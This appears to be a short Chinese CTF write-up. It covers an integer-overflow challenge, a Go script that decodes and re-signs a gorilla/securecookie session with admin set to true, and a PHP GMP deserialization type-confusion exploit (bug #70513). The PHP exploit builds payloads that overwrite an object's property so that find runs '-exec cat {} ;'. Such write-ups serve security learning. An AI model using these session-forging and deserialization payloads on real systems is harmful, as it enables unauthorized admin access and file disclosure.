卡片商店
整数溢出
大概是2 ** 63 - 2
go cookie
没学过,慢慢看,关键是怎么看出来是gin的,是因为cookie开头是MTU
吗
package main
import (
"fmt"
"github.com/gorilla/securecookie"
)
var (
hashKey = []byte("Udc13VD5adM_c10nPxFu@v12")
init = securecookie.New(hashKey, nil)
cookie = "MTU5OTIyMzkzOHxEdi1CQkFFQ180SUFBUkFCRUFBQV81dl9nZ0FDQm5OMGNtbHVad3dJQUFaM1lXeHNaWFFHYzNSeWFXNW5ER1FBWW5zaWIzZHBibWR6SWpwYlhTd2lhVzUyWlhOMGN5STZXMTBzSW0xdmJtVjVJam94TWpJeU1qSXhPRFE1T0RrNU9ERTNOeXdpYm05M1gzUnBiV1VpT2pFMU9Ua3lNak0xT0RBc0luTjBZWEowWDNScGJXVWlPakUxT1RreU1qTTBNREI5Qm5OMGNtbHVad3dIQUFWaFpHMXBiZ1JpYjI5c0FnSUFBQT09fJpiqcBLlxJJIorq5kZWajwO4UHCF02nu8z9OVlphBvj"
)
func main() {
var values map[interface{}]interface{}
if err := init.Decode("session",cookie, &values); err == nil {
fmt.Print(values)
values["admin"] = true
fmt.Print(init.Encode("session", values))
}
}
Overwrite Me
GMP--从反序列化到类型混淆漏洞
php >5.6 <5.6.11
可以覆盖任意已实例化的类的属性
从反序列化到类型混淆漏洞——记一次 ecshop 实例利用
Sec Bug #70513 GMP Deserialization Type Confusion Vulnerability
两种利用方式,一种是利用有__wakeup
的类,一种是利用DateInterval
以题目源码为例简化版的
<?php
class MyClass
{
var $kw0ng;
var $flag;
public function __wakeup()
{
$this->kw0ng = 2;
}
public function get_flag()
{
return system('find /HackersForever ' . escapeshellcmd($this->flag));
}
}
$show = new ShowOff();//第一个实例化的类
$bullet = $_GET['bullet'];
$obstacle = new stdClass;//第二个实例化的类
$mc = new MyClass();//第三个实例化的类
$mc->flag = "MyClass's flag said, Overwrite Me If You Can!";
@unserialize($bullet);
echo $mc->get_flag();
MyClass.__wakeup()
$inner = 's:1:"1";a:3:{s:4:"flag";s:14:"-exec cat {} ;";s:2:"bb";s:2:"hi";i:0;O:7:"MyClass":1:{s:5:"kw0ng";R:2;}}';
$exploit = 'a:1:{i:0;C:3:"GMP":'.strlen($inner).':{'.$inner.'}}';
$inner
里面是要覆盖的属性,最后一个O
类型里面是存在__wakeup
且__wakeup
的内容是给属性赋值的类,关键是要覆盖的类必须是指定顺序实例化,比如这里,MyClass
是第三个实例化,所以MyClass
的__wakeup()
必须是
public function __wakeup()
{
$this->kw0ng = 3;
}
DateInterval
$pos = "3";//第三个实例化
$inj = "-exec cat {} ;";
$inner = 's:1:"'.$pos.'";a:3:{s:4:"flag";s:'.strlen($inj).':"'.$inj.'";s:2:"hi";s:2:"aa";i:0;O:12:"DateInterval":1:{s:1:"y";R:2;}}';
$exploit = 'a:1:{i:0;C:3:"GMP":'.strlen($inner).':{'.$inner.'}}';